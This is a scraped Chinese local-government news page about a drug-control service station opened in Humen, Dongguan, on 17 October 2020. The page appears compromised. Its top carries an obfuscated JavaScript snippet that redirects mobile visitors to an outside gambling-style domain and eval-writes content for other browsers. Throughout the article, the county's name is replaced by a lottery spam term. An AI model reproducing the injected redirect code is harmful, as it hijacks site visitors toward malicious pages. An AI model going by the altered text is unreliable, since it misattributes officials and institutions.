function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();
.banner-img {background: url(/cssz/ljym/201902/W020200829846815767504.jpg) no-repeat center;}

    | 网站支持IPv6 |
  





当前位置:
腾讯十分彩网   ->   政务公开   ->   基础腾讯十分彩   ->   新闻动态   ->   灵山要闻腾讯十分彩网

腾讯十分彩网驻粤禁毒工作服务站成立

2020-10-20 09:35 来源:腾讯十分彩网融媒体中心


分享到: 【打印本页】 【字体: 大   中   】   

  1017日,腾讯十分彩网驻粤禁毒工作服务站在广东东莞市虎门镇挂牌成立,标志着腾讯十分彩网吸毒人员异地管控工作迈出了新步伐,在深化粤桂间警务协作上实现了新突破。


  腾讯十分彩网县长、县禁毒委主任刘钦,腾讯十分彩网政协主席宋光毅,腾讯十分彩网委常委、统战部部长冯远波,东莞市滨海湾新区党工委书记、管委会主任、虎门镇党委书记罗斌,广东省东莞市公安局副局长陈成枝,广东省东莞市公安局禁毒支队支队长张策参加揭牌仪式。


  腾讯十分彩网副县长、县公安局局长、县禁毒委副主任曾方来主持揭牌仪式。


  刘钦在仪式上致辞,对长期以来关心支持灵山禁毒工作的各界人士表示感谢。刘钦说,腾讯十分彩网驻粤禁毒工作服务站的成立,必将对两地开展禁毒工作产生积极的推动作用和示范效应。


  刘钦希望工作站全体人员严格按照既定的职责,强化信息收集的落实,强化管控服务的推进,强化治本之策的研究,强化工作合力的形成,强化公共关系的创建,不断创新,真正从源头上解决灵山外流贩毒及管控难题,营造“人人参与禁毒斗争”的良好局面,再创禁毒工作佳绩。


  刘钦、宋光毅、冯远波、曾方来、罗斌、陈成枝、张策共同为服务站成立揭牌。


  近年来,灵山以习近平新时代中国特色社会主义思想为指导,紧紧围绕推进国家治理体系和治理能力现代化的总要求,进一步健全和完善禁毒整治机制,禁毒治毒精准到位,横向到底、纵深到边,综合治理进一步深化。针对吸毒人员外流,管控难度大这一顽症,灵山强化担当,积极创新,主动作为,不断完善桂粤两地联合打击外流贩毒工作机制,得到了广东省的大力支持,两地共同探索异地吸毒人员管控工作模式,取得了阶段性成效。(杨本忠 波) 

核发:腾讯十分彩网融媒体中心




导航链接: